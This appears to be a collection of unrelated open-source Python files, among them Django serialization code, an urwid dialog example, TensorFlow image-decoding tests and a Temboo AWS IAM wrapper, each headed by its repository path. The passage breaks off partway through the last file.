|
gridcells/core/arena.py
|
2
|
'''
==============================================
:mod:`gridcells.core.arena` - Defining arenas
==============================================
The :mod:`~gridcells.core.arena` module provides class definitions of arenas. These
can subsequently be used as input to process spiking data and generate spatial
firing fields/autocorrelations.
These types of arenas are currently defined:
--------------------------------------------
.. autosummary::
Arena
CircularArena
RectangularArena
SquareArena
'''
from __future__ import absolute_import, print_function, division
import numpy as np
from .common import Pair2D
##############################################################################
class Arena(object):
'''An abstract class for arenas.
This class is an interface for obtaining discretisations of the arenas and
masks when the shape is not rectangular.
'''
def getDiscretisation(self):
'''Obtain the discretisation of this arena.
Returns
=======
d : gridcells.core.Pair2D
A pair of x and y coordinates for the positions in the arena. Units
are arbitrary.
'''
raise NotImplementedError()
def getMask(self):
'''Return mask (a 2D ``np.ndarray``) of where the positions in the
arena are valid.
For instance, with a circular arena, all positions outside its radius
are invalid.
'''
raise NotImplementedError()
class RectangularArena(Arena):
'''A rectangular arena.
Use :class:`~gridcells.core.RectangularArena` when you need to work with
rectangular arenas.
.. note::
The origin (0, 0) of the coordinate system in all the arenas is in the
bottom-left corner of the arena.
'''
def __init__(self, size, discretisation):
self._sz = size
self._q = discretisation
def getDiscretisation(self):
# np.linspace() needs an integer sample count; with true division in
# effect (see the __future__ import above), truncate explicitly.
numX = int(self._sz.x / self._q.x) + 1
numY = int(self._sz.y / self._q.y) + 1
xedges = np.linspace(0., self._sz.x, numX)
yedges = np.linspace(0., self._sz.y, numY)
return Pair2D(xedges, yedges)
def getDiscretisationSteps(self):
return self._q
def getMask(self):
return None
def getSize(self):
return self._sz
@property
def sz(self):
'''Return the size of the arena. Equivalent to
:meth:`~RectangularArena.getSize`.
'''
return self._sz
@property
def bounds(self):
return Pair2D(
(0., self._sz.x),
(0., self._sz.y)
)
class SquareArena(RectangularArena):
'''A square arena.'''
def __init__(self, size, discretisation):
tmpSz = Pair2D(size, size)
super(SquareArena, self).__init__(tmpSz, discretisation)
class CircularArena(SquareArena):
'''A circular arena.'''
def __init__(self, radius, discretisation):
super(CircularArena, self).__init__(radius*2., discretisation)
self.radius = radius
def getMask(self):
edges = self.getDiscretisation()
X, Y = np.meshgrid(edges.x, edges.y)
# The origin is in the bottom-left corner (see RectangularArena), so the
# circle is centred at (radius, radius) rather than at (0, 0).
return np.sqrt((X - self.radius)**2 + (Y - self.radius)**2) > self.radius
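# A minimal usage sketch (sizes illustrative): a 100x100 arena binned in
# 5-unit steps, and a circular arena whose mask flags invalid positions:
#     arena = SquareArena(100., Pair2D(5., 5.))
#     edges = arena.getDiscretisation()  # Pair2D of x/y bin edges
#     circ = CircularArena(50., Pair2D(5., 5.))
#     mask = circ.getMask()  # boolean array, True == outside the arena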
|
krishna-pandey-git/django
|
refs/heads/master
|
django/core/serializers/python.py
|
140
|
"""
A Python "serializer". Doesn't do much serializing per se -- just converts to
and from basic Python data types (lists, dicts, strings, etc.). Useful as a basis for
other serializers.
"""
from __future__ import unicode_literals
from collections import OrderedDict
from django.apps import apps
from django.conf import settings
from django.core.serializers import base
from django.db import DEFAULT_DB_ALIAS, models
from django.utils import six
from django.utils.encoding import force_text, is_protected_type
class Serializer(base.Serializer):
"""
Serializes a QuerySet to basic Python objects.
"""
internal_use_only = True
def start_serialization(self):
self._current = None
self.objects = []
def end_serialization(self):
pass
def start_object(self, obj):
self._current = OrderedDict()
def end_object(self, obj):
self.objects.append(self.get_dump_object(obj))
self._current = None
def get_dump_object(self, obj):
model = obj._meta.proxy_for_model if obj._deferred else obj.__class__
data = OrderedDict([('model', force_text(model._meta))])
if not self.use_natural_primary_keys or not hasattr(obj, 'natural_key'):
data["pk"] = force_text(obj._get_pk_val(), strings_only=True)
data['fields'] = self._current
return data
def handle_field(self, obj, field):
value = field.value_from_object(obj)
# Protected types (i.e., primitives like None, numbers, dates,
# and Decimals) are passed through as is. All other values are
# converted to string first.
if is_protected_type(value):
self._current[field.name] = value
else:
self._current[field.name] = field.value_to_string(obj)
def handle_fk_field(self, obj, field):
if self.use_natural_foreign_keys and hasattr(field.remote_field.model, 'natural_key'):
related = getattr(obj, field.name)
if related:
value = related.natural_key()
else:
value = None
else:
value = getattr(obj, field.get_attname())
if not is_protected_type(value):
value = field.value_to_string(obj)
self._current[field.name] = value
def handle_m2m_field(self, obj, field):
if field.remote_field.through._meta.auto_created:
if self.use_natural_foreign_keys and hasattr(field.remote_field.model, 'natural_key'):
m2m_value = lambda value: value.natural_key()
else:
m2m_value = lambda value: force_text(value._get_pk_val(), strings_only=True)
self._current[field.name] = [m2m_value(related)
for related in getattr(obj, field.name).iterator()]
def getvalue(self):
return self.objects
def Deserializer(object_list, **options):
"""
Deserialize simple Python objects back into Django ORM instances.
It's expected that you pass the Python objects themselves (instead of a
stream or a string) to the constructor.
"""
db = options.pop('using', DEFAULT_DB_ALIAS)
ignore = options.pop('ignorenonexistent', False)
for d in object_list:
# Look up the model and start building a dict of data for it.
try:
Model = _get_model(d["model"])
except base.DeserializationError:
if ignore:
continue
else:
raise
data = {}
if 'pk' in d:
try:
data[Model._meta.pk.attname] = Model._meta.pk.to_python(d.get('pk'))
except Exception as e:
raise base.DeserializationError.WithData(e, d['model'], d.get('pk'), None)
m2m_data = {}
field_names = {f.name for f in Model._meta.get_fields()}
# Handle each field
for (field_name, field_value) in six.iteritems(d["fields"]):
if ignore and field_name not in field_names:
# skip fields no longer on model
continue
if isinstance(field_value, str):
field_value = force_text(
field_value, options.get("encoding", settings.DEFAULT_CHARSET), strings_only=True
)
field = Model._meta.get_field(field_name)
# Handle M2M relations
if field.remote_field and isinstance(field.remote_field, models.ManyToManyRel):
if hasattr(field.remote_field.model._default_manager, 'get_by_natural_key'):
def m2m_convert(value):
if hasattr(value, '__iter__') and not isinstance(value, six.text_type):
return field.remote_field.model._default_manager.db_manager(db).get_by_natural_key(*value).pk
else:
return force_text(field.remote_field.model._meta.pk.to_python(value), strings_only=True)
else:
m2m_convert = lambda v: force_text(field.remote_field.model._meta.pk.to_python(v), strings_only=True)
try:
m2m_data[field.name] = []
for pk in field_value:
m2m_data[field.name].append(m2m_convert(pk))
except Exception as e:
raise base.DeserializationError.WithData(e, d['model'], d.get('pk'), pk)
# Handle FK fields
elif field.remote_field and isinstance(field.remote_field, models.ManyToOneRel):
if field_value is not None:
try:
if hasattr(field.remote_field.model._default_manager, 'get_by_natural_key'):
if hasattr(field_value, '__iter__') and not isinstance(field_value, six.text_type):
obj = field.remote_field.model._default_manager.db_manager(db).get_by_natural_key(*field_value)
value = getattr(obj, field.remote_field.field_name)
# If this is a natural foreign key to an object that
# has a FK/O2O as the foreign key, use the FK value
if field.remote_field.model._meta.pk.remote_field:
value = value.pk
else:
value = field.remote_field.model._meta.get_field(field.remote_field.field_name).to_python(field_value)
data[field.attname] = value
else:
data[field.attname] = field.remote_field.model._meta.get_field(field.remote_field.field_name).to_python(field_value)
except Exception as e:
raise base.DeserializationError.WithData(e, d['model'], d.get('pk'), field_value)
else:
data[field.attname] = None
# Handle all other fields
else:
try:
data[field.name] = field.to_python(field_value)
except Exception as e:
raise base.DeserializationError.WithData(e, d['model'], d.get('pk'), field_value)
obj = base.build_instance(Model, data, db)
yield base.DeserializedObject(obj, m2m_data)
def _get_model(model_identifier):
"""
Helper to look up a model from an "app_label.model_name" string.
"""
try:
return apps.get_model(model_identifier)
except (LookupError, TypeError):
raise base.DeserializationError("Invalid model identifier: '%s'" % model_identifier)
|
hkoof/urwid
|
refs/heads/master
|
examples/dialog.py
|
4
|
#!/usr/bin/python
#
# Urwid example similar to dialog(1) program
# Copyright (C) 2004-2009 Ian Ward
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Urwid web site: http://excess.org/urwid/
"""
Urwid example similar to dialog(1) program
"""
import sys
import urwid
class DialogExit(Exception):
pass
class DialogDisplay:
palette = [
('body','black','light gray', 'standout'),
('border','black','dark blue'),
('shadow','white','black'),
('selectable','black', 'dark cyan'),
('focus','white','dark blue','bold'),
('focustext','light gray','dark blue'),
]
def __init__(self, text, height, width, body=None):
width = int(width)
if width <= 0:
width = ('relative', 80)
height = int(height)
if height <= 0:
height = ('relative', 80)
self.body = body
if body is None:
# fill space with nothing
body = urwid.Filler(urwid.Divider(),'top')
self.frame = urwid.Frame( body, focus_part='footer')
if text is not None:
self.frame.header = urwid.Pile( [urwid.Text(text),
urwid.Divider()] )
w = self.frame
# pad area around listbox
w = urwid.Padding(w, ('fixed left',2), ('fixed right',2))
w = urwid.Filler(w, ('fixed top',1), ('fixed bottom',1))
w = urwid.AttrWrap(w, 'body')
# "shadow" effect
w = urwid.Columns( [w,('fixed', 2, urwid.AttrWrap(
urwid.Filler(urwid.Text(('border',' ')), "top")
,'shadow'))])
w = urwid.Frame( w, footer =
urwid.AttrWrap(urwid.Text(('border',' ')),'shadow'))
# outermost border area
w = urwid.Padding(w, 'center', width )
w = urwid.Filler(w, 'middle', height )
w = urwid.AttrWrap( w, 'border' )
self.view = w
def add_buttons(self, buttons):
l = []
for name, exitcode in buttons:
b = urwid.Button( name, self.button_press )
b.exitcode = exitcode
b = urwid.AttrWrap( b, 'selectable','focus' )
l.append( b )
self.buttons = urwid.GridFlow(l, 10, 3, 1, 'center')
self.frame.footer = urwid.Pile( [ urwid.Divider(),
self.buttons ], focus_item = 1)
def button_press(self, button):
raise DialogExit(button.exitcode)
def main(self):
self.loop = urwid.MainLoop(self.view, self.palette)
try:
self.loop.run()
except DialogExit as e:
return self.on_exit( e.args[0] )
def on_exit(self, exitcode):
return exitcode, ""
class InputDialogDisplay(DialogDisplay):
def __init__(self, text, height, width):
self.edit = urwid.Edit()
body = urwid.ListBox([self.edit])
body = urwid.AttrWrap(body, 'selectable','focustext')
DialogDisplay.__init__(self, text, height, width, body)
self.frame.set_focus('body')
def unhandled_key(self, size, k):
if k in ('up','page up'):
self.frame.set_focus('body')
if k in ('down','page down'):
self.frame.set_focus('footer')
if k == 'enter':
# pass enter to the "ok" button
self.frame.set_focus('footer')
self.view.keypress( size, k )
def on_exit(self, exitcode):
return exitcode, self.edit.get_edit_text()
class TextDialogDisplay(DialogDisplay):
def __init__(self, file, height, width):
l = []
# read the whole file (being slow, not lazy this time)
for line in open(file).readlines():
l.append( urwid.Text( line.rstrip() ))
body = urwid.ListBox(l)
body = urwid.AttrWrap(body, 'selectable','focustext')
DialogDisplay.__init__(self, None, height, width, body)
def unhandled_key(self, size, k):
if k in ('up','page up','down','page down'):
self.frame.set_focus('body')
self.view.keypress( size, k )
self.frame.set_focus('footer')
class ListDialogDisplay(DialogDisplay):
def __init__(self, text, height, width, constr, items, has_default):
j = []
if has_default:
k, tail = 3, ()
else:
k, tail = 2, ("no",)
while items:
j.append( items[:k] + tail )
items = items[k:]
l = []
self.items = []
for tag, item, default in j:
w = constr( tag, default=="on" )
self.items.append(w)
w = urwid.Columns( [('fixed', 12, w),
urwid.Text(item)], 2 )
w = urwid.AttrWrap(w, 'selectable','focus')
l.append(w)
lb = urwid.ListBox(l)
lb = urwid.AttrWrap( lb, "selectable" )
DialogDisplay.__init__(self, text, height, width, lb )
self.frame.set_focus('body')
def unhandled_key(self, size, k):
if k in ('up','page up'):
self.frame.set_focus('body')
if k in ('down','page down'):
self.frame.set_focus('footer')
if k == 'enter':
# pass enter to the "ok" button
self.frame.set_focus('footer')
self.buttons.set_focus(0)
self.view.keypress( size, k )
def on_exit(self, exitcode):
"""Print the tag of the item selected."""
if exitcode != 0:
return exitcode, ""
s = ""
for i in self.items:
if i.get_state():
s = i.get_label()
break
return exitcode, s
class CheckListDialogDisplay(ListDialogDisplay):
def on_exit(self, exitcode):
"""
Mimic dialog(1)'s --checklist exit.
Put each checked item in double quotes with a trailing space.
"""
if exitcode != 0:
return exitcode, ""
l = []
for i in self.items:
if i.get_state():
l.append(i.get_label())
return exitcode, "".join(['"'+tag+'" ' for tag in l])
class MenuItem(urwid.Text):
"""A custom widget for the --menu option"""
def __init__(self, label):
urwid.Text.__init__(self, label)
self.state = False
def selectable(self):
return True
def keypress(self,size,key):
if key == "enter":
self.state = True
raise DialogExit(0)
return key
def mouse_event(self,size,event,button,col,row,focus):
if event=='mouse release':
self.state = True
raise DialogExit(0)
return False
def get_state(self):
return self.state
def get_label(self):
text, attr = self.get_text()
return text
def do_checklist(text, height, width, list_height, *items):
def constr(tag, state):
return urwid.CheckBox(tag, state)
d = CheckListDialogDisplay( text, height, width, constr, items, True)
d.add_buttons([ ("OK", 0), ("Cancel", 1) ])
return d
def do_inputbox(text, height, width):
d = InputDialogDisplay( text, height, width )
d.add_buttons([ ("Exit", 0) ])
return d
def do_menu(text, height, width, menu_height, *items):
def constr(tag, state ):
return MenuItem(tag)
d = ListDialogDisplay(text, height, width, constr, items, False)
d.add_buttons([ ("OK", 0), ("Cancel", 1) ])
return d
def do_msgbox(text, height, width):
d = DialogDisplay( text, height, width )
d.add_buttons([ ("OK", 0) ])
return d
def do_radiolist(text, height, width, list_height, *items):
radiolist = []
def constr(tag, state, radiolist=radiolist):
return urwid.RadioButton(radiolist, tag, state)
d = ListDialogDisplay( text, height, width, constr, items, True )
d.add_buttons([ ("OK", 0), ("Cancel", 1) ])
return d
def do_textbox(file, height, width):
d = TextDialogDisplay( file, height, width )
d.add_buttons([ ("Exit", 0) ])
return d
def do_yesno(text, height, width):
d = DialogDisplay( text, height, width )
d.add_buttons([ ("Yes", 0), ("No", 1) ])
return d
MODES={ '--checklist': (do_checklist,
"text height width list-height [ tag item status ] ..."),
'--inputbox': (do_inputbox,
"text height width"),
'--menu': (do_menu,
"text height width menu-height [ tag item ] ..."),
'--msgbox': (do_msgbox,
"text height width"),
'--radiolist': (do_radiolist,
"text height width list-height [ tag item status ] ..."),
'--textbox': (do_textbox,
"file height width"),
'--yesno': (do_yesno,
"text height width"),
}
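# For example, running (mode and arguments illustrative):
#     python dialog.py --msgbox "Hello" 0 0
# shows a message box; a height and width of 0 mean auto-size (see
# show_usage below).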
def show_usage():
"""
Display a helpful usage message.
"""
modelist = [(mode, help) for (mode, (fn, help)) in MODES.items()]
modelist.sort()
sys.stdout.write(
__doc__ +
"\n".join(["%-15s %s"%(mode,help) for (mode,help) in modelist])
+ """
height and width may be set to 0 to auto-size.
list-height and menu-height are currently ignored.
status may be either on or off.
""" )
def main():
if len(sys.argv) < 2 or sys.argv[1] not in MODES:
show_usage()
return
# Create a DialogDisplay instance
fn, help = MODES[sys.argv[1]]
d = fn( * sys.argv[2:] )
# Run it
exitcode, exitstring = d.main()
# Exit
if exitstring:
sys.stderr.write(exitstring+"\n")
sys.exit(exitcode)
if __name__=="__main__":
main()
|
hmen89/odoo
|
refs/heads/master
|
addons/analytic_user_function/__init__.py
|
441
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import analytic_user_function
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
drewandersonnz/openshift-tools
|
refs/heads/prod
|
ansible/roles/lib_gcloud/build/ansible/gcloud_compute_image.py
|
13
|
# pylint: skip-file
# vim: expandtab:tabstop=4:shiftwidth=4
#pylint: disable=too-many-branches
def main():
''' ansible module for gcloud compute images'''
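# A hypothetical playbook task exercising this module (values illustrative):
#     - gcloud_compute_image:
#         name: rhel-7-base
#         state: present
#         source_uri: gs://some-bucket/image.tar.gz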
module = AnsibleModule(
argument_spec=dict(
# credentials
state=dict(default='present', type='str',
choices=['present', 'absent', 'list']),
name=dict(default=None, type='str'),
description=dict(default=None, type='str'),
family=dict(default=None, type='str'),
licenses=dict(default=None, type='list'),
source_disk=dict(default=None, type='str'),
source_disk_zone=dict(default=None, type='str'),
source_uri=dict(default=None, type='str'),
),
supports_check_mode=True,
)
gimage = GcloudComputeImage(module.params['name'],
module.params['description'],
module.params['family'],
module.params['licenses'],
module.params['source_disk'],
module.params['source_disk_zone'],
module.params['source_uri'])
state = module.params['state']
api_rval = gimage.list_images(module.params['name'])
#####
# Get
#####
if state == 'list':
if api_rval['returncode'] != 0:
module.fail_json(msg=api_rval, state="list")
module.exit_json(changed=False, results=api_rval['results'], state="list")
########
# Delete
########
if state == 'absent':
if gimage.exists():
if module.check_mode:
module.exit_json(changed=False, msg='Would have performed a delete.')
api_rval = gimage.delete_image()
module.exit_json(changed=True, results=api_rval, state="absent")
module.exit_json(changed=False, state="absent")
if state == 'present':
########
# Create
########
if not gimage.exists():
if module.check_mode:
module.exit_json(changed=False, msg='Would have performed a create.')
# Create it here
api_rval = gimage.create_image()
if api_rval['returncode'] != 0:
module.fail_json(msg=api_rval)
module.exit_json(changed=True, results=api_rval, state="present")
module.exit_json(changed=False, results=api_rval, state="present")
module.exit_json(failed=True,
changed=False,
results='Unknown state passed. %s' % state,
state="unknown")
#if __name__ == '__main__':
# gcloud = GcloudComputeImage('rhel-7-base-2016-06-10')
# print gcloud.list_images()
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import, locally-disabled
# import module snippets. This are required
from ansible.module_utils.basic import *
main()
|
nooperpudd/quantbube
|
refs/heads/master
|
quantbube/singals.py
|
3
|
# encoding:utf-8
|
drakeloud/louderdev
|
refs/heads/master
|
louderdev/bin/rst2man.py
|
1
|
#!/Users/Drake/dev/LouderDev/louderdev/bin/python3
# Author:
# Contact: grubert@users.sf.net
# Copyright: This module has been placed in the public domain.
"""
man.py
======
This module provides a simple command line interface that uses the
man page writer to output from ReStructuredText source.
"""
import locale
try:
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
from docutils.writers import manpage
description = ("Generates plain unix manual documents. " + default_description)
publish_cmdline(writer=manpage.Writer(), description=description)
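# Typical invocation (file names illustrative):
#     rst2man.py README.txt > readme.1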
|
MalloyDelacroix/DownloaderForReddit
|
refs/heads/master
|
DownloaderForReddit/utils/importers/json_importer.py
|
1
|
"""
Downloader for Reddit takes a list of reddit users and subreddits and downloads content posted to reddit either by the
users or on the subreddits.
Copyright (C) 2017, Kyle Hickey
This file is part of the Downloader for Reddit.
Downloader for Reddit is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Downloader for Reddit is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Downloader for Reddit. If not, see <http://www.gnu.org/licenses/>.
"""
import json
import logging
from datetime import datetime
from . import legacy_import
from DownloaderForReddit.database.models import User, Subreddit
from DownloaderForReddit.database.model_enums import (LimitOperator, PostSortMethod, NsfwFilter, CommentDownload,
CommentSortMethod)
logger = logging.getLogger(f'DownloaderForReddit.{__name__}')
EXPELLED_KEYS = ['lists', 'posts', 'content', 'comments']
TYPE_MAP = {
'date_created': lambda x: datetime.strptime(x, '%m/%d/%Y %I:%M %p'),
'post_score_limit_operator': lambda x: LimitOperator(x),
'post_sort_method': lambda x: PostSortMethod(x),
'download_nsfw': lambda x: NsfwFilter(x),
'extract_comments': lambda x: CommentDownload(x),
'download_comments': lambda x: CommentDownload(x),
'download_comment_content': lambda x: CommentDownload(x),
'comment_score_limit_operator': lambda x: LimitOperator(x),
'comment_sort_method': lambda x: CommentSortMethod(x),
'date_added': lambda x: datetime.strptime(x, '%m/%d/%Y %I:%M %p'),
'absolute_date_limit': lambda x: datetime.strptime(x, '%m/%d/%Y %I:%M %p'),
'date_limit': lambda x: datetime.strptime(x, '%m/%d/%Y %I:%M %p')
}
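# Sketch of how TYPE_MAP is applied on import (values illustrative): a raw
# json value such as '01/02/2020 03:04 PM' for 'date_added' becomes a
# datetime, and an integer such as 2 for 'post_sort_method' becomes
# PostSortMethod(2); keys without a converter pass through unchanged.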
def import_json(file_path):
reddit_objects = []
with open(file_path, 'r', encoding='utf-8') as file:
j = json.load(file)
try:
reddit_objects = import_reddit_objects(j)
logger.info('Imported reddit objects from json file', extra={'file_path': file_path,
'import_count': len(reddit_objects)})
except KeyError:
pass
return reddit_objects
def import_reddit_objects(json_element):
new_ros = json_element.get('reddit_objects', None)
ro_lists = json_element.get('reddit_object_lists', None)
legacy_ros = json_element.get('object_list', None)
if new_ros is not None:
return _get_reddit_objects(new_ros)
elif ro_lists is not None:
ros = []
for ro_list in ro_lists:
ros.extend(ro_list['reddit_objects'])
return _get_reddit_objects(ros)
else:
return legacy_import.import_legacy(legacy_ros)
def _get_reddit_objects(ro_data):
reddit_objects = []
for ro in ro_data:
model = User if ro['object_type'] == 'USER' else Subreddit
_clean_ro_element(ro)
reddit_object = model(**ro)
reddit_objects.append(reddit_object)
return reddit_objects
def _clean_ro_element(ro_element):
for key in EXPELLED_KEYS:
try:
del ro_element[key]
except KeyError:
pass
for key, value in ro_element.items():
try:
ro_element[key] = TYPE_MAP[key](value)
except (KeyError, TypeError):
pass
|
litui/openparliament
|
refs/heads/master
|
parliament/accounts/migrations/0003_rename_data.py
|
2
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import jsonfield.fields
class Migration(migrations.Migration):

    dependencies = [
        ('accounts', '0002_add_name_and_bouncedata'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='user',
            name='json_data',
        ),
        migrations.AddField(
            model_name='user',
            name='data',
            # A callable default avoids sharing one mutable dict between instances.
            field=jsonfield.fields.JSONField(default=dict),
        ),
    ]
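

# Note: the RemoveField/AddField pair above drops whatever was stored in the old
# json_data column rather than carrying it over. If the values had needed to be
# preserved (and the column types were compatible), a rename-based migration would
# be the usual approach; a hedged sketch, not this project's actual code:
#
#     operations = [
#         migrations.RenameField(
#             model_name='user',
#             old_name='json_data',
#             new_name='data',
#         ),
#     ]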
|
gunan/tensorflow
|
refs/heads/master
|
tensorflow/python/kernel_tests/decode_image_op_test.py
|
22
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for decode_image."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
import numpy as np
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import test_util
from tensorflow.python.ops import image_ops
from tensorflow.python.ops import io_ops
import tensorflow.python.ops.nn_grad # pylint: disable=unused-import
from tensorflow.python.platform import test
prefix_path = "tensorflow/core/lib"
class DecodeImageOpTest(test.TestCase):

  def testBmp(self):
    # Read a real bmp and verify shape.
    path = os.path.join(prefix_path, "bmp", "testdata", "lena.bmp")
    with self.session(use_gpu=True):
      bmp0 = io_ops.read_file(path)
      image0 = image_ops.decode_image(bmp0)
      image1 = image_ops.decode_bmp(bmp0)
      bmp0, image0, image1 = self.evaluate([bmp0, image0, image1])
      self.assertEqual(len(bmp0), 4194)
      self.assertAllEqual(image0, image1)

  @test_util.run_deprecated_v1
  def testGif(self):
    # Read some real GIFs.
    path = os.path.join(prefix_path, "gif", "testdata", "scan.gif")
    width = 20
    height = 40
    stride = 5
    shape = (12, height, width, 3)
    with self.session(use_gpu=True):
      gif0 = io_ops.read_file(path)
      image0 = image_ops.decode_image(gif0)
      image1 = image_ops.decode_gif(gif0)
      gif0, image0, image1 = self.evaluate([gif0, image0, image1])
      self.assertEqual(image0.shape, shape)
      self.assertAllEqual(image0, image1)
      # scan.gif contains a single white bar that advances by `stride` pixels
      # per frame, first across the columns and then down the rows.
      for frame_idx, frame in enumerate(image0):
        gt = np.zeros(shape[1:], dtype=np.uint8)
        start = frame_idx * stride
        end = (frame_idx + 1) * stride
        if end <= width:
          gt[:, start:end, :] = 255
        else:
          start -= width
          end -= width
          gt[start:end, :, :] = 255
        self.assertAllClose(frame, gt)
      bad_channels = image_ops.decode_image(gif0, channels=1)
      with self.assertRaises(errors_impl.InvalidArgumentError):
        self.evaluate(bad_channels)

  @test_util.run_deprecated_v1
  def testJpeg(self):
    # Read a real jpeg and verify shape.
    path = os.path.join(prefix_path, "jpeg", "testdata", "jpeg_merge_test1.jpg")
    with self.session(use_gpu=True):
      jpeg0 = io_ops.read_file(path)
      image0 = image_ops.decode_image(jpeg0)
      image1 = image_ops.decode_jpeg(jpeg0)
      jpeg0, image0, image1 = self.evaluate([jpeg0, image0, image1])
      self.assertEqual(len(jpeg0), 3771)
      self.assertEqual(image0.shape, (256, 128, 3))
      self.assertAllEqual(image0, image1)
      bad_channels = image_ops.decode_image(jpeg0, channels=4)
      with self.assertRaises(errors_impl.InvalidArgumentError):
        self.evaluate(bad_channels)

  def testPng(self):
    # Read some real PNGs, converting to different channel numbers.
    inputs = [(1, "lena_gray.png")]
    for channels_in, filename in inputs:
      for channels in 0, 1, 3, 4:
        with self.cached_session(use_gpu=True):
          path = os.path.join(prefix_path, "png", "testdata", filename)
          png0 = io_ops.read_file(path)
          image0 = image_ops.decode_image(png0, channels=channels)
          image1 = image_ops.decode_png(png0, channels=channels)
          png0, image0, image1 = self.evaluate([png0, image0, image1])
          self.assertEqual(image0.shape, (26, 51, channels or channels_in))
          self.assertAllEqual(image0, image1)

  @test_util.run_deprecated_v1
  def testInvalidBytes(self):
    image_bytes = b"ThisIsNotAnImage!"
    decode = image_ops.decode_image(image_bytes)
    with self.cached_session():
      with self.assertRaises(errors_impl.InvalidArgumentError):
        self.evaluate(decode)
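

# A minimal usage sketch (not exercised by the tests above; the file path is a
# hypothetical placeholder): decode_image sniffs the format from the file
# header, so the same call handles BMP, GIF, JPEG and PNG alike.
def _example_decode_any_image(path="/tmp/example.png"):
  raw = io_ops.read_file(path)
  # channels=3 requests an RGB result; GIFs decode to a 4-D [frames, h, w, 3]
  # tensor while the still-image formats decode to 3-D [h, w, 3].
  return image_ops.decode_image(raw, channels=3)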
if __name__ == "__main__":
  test.main()
|
jordanemedlock/psychtruths
|
refs/heads/master
|
temboo/Library/Amazon/IAM/DeleteSigningCertificate.py
|
5
|
# -*- coding: utf-8 -*-
###############################################################################
#
# DeleteSigningCertificate
# Deletes the specified signing certificate associated with the specified user.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class DeleteSigningCertificate(Choreography):

    def __init__(self, temboo_session):
        """
        Create a new instance of the DeleteSigningCertificate Choreo. A TembooSession object, containing a valid
        set of Temboo credentials, must be supplied.
        """
        super(DeleteSigningCertificate, self).__init__(temboo_session, '/Library/Amazon/IAM/DeleteSigningCertificate')

    def new_input_set(self):
        return DeleteSigningCertificateInputSet()

    def _make_result_set(self, result, path):
        return DeleteSigningCertificateResultSet(result, path)

    def _make_execution(self, session, exec_id, path):
        return DeleteSigningCertificateChoreographyExecution(session, exec_id, path)


class DeleteSigningCertificateInputSet(InputSet):
    """
    An InputSet with methods appropriate for specifying the inputs to the DeleteSigningCertificate
    Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
    """
    def set_AWSAccessKeyId(self, value):
        """
        Set the value of the AWSAccessKeyId input for this Choreo. ((required, string) The Access Key ID provided by Amazon Web Services.)
        """
        super(DeleteSigningCertificateInputSet, self)._set_input('AWSAccessKeyId', value)

    def set_AWSSecretKeyId(self, value):
        """
        Set the value of the AWSSecretKeyId input for this Choreo. ((required, string) The Secret Key ID provided by Amazon Web Services.)
        """
        super(DeleteSigningCertificateInputSet, self)._set_input('AWSSecretKeyId', value)

    def set_CertificateId(self, value):
        """
        Set the value of the CertificateId input for this Choreo. ((required, string) ID of the signing certificate to delete.)
        """
        super(DeleteSigningCertificateInputSet, self)._set_input('CertificateId', value)

    def set_ResponseFormat(self, value):
        """
        Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that the response should be in. Valid values are "xml" (the default) and "json".)
        """
        super(DeleteSigningCertificateInputSet, self)._set_input('ResponseFormat', value)

    def set_UserName(self, value):
        """
        Set the value of the UserName input for this Choreo. ((optional, string) Name of the user the signing certificate belongs to.)
        """
        super(DeleteSigningCertificateInputSet, self)._set_input('UserName', value)


class DeleteSigningCertificateResultSet(ResultSet):
    """
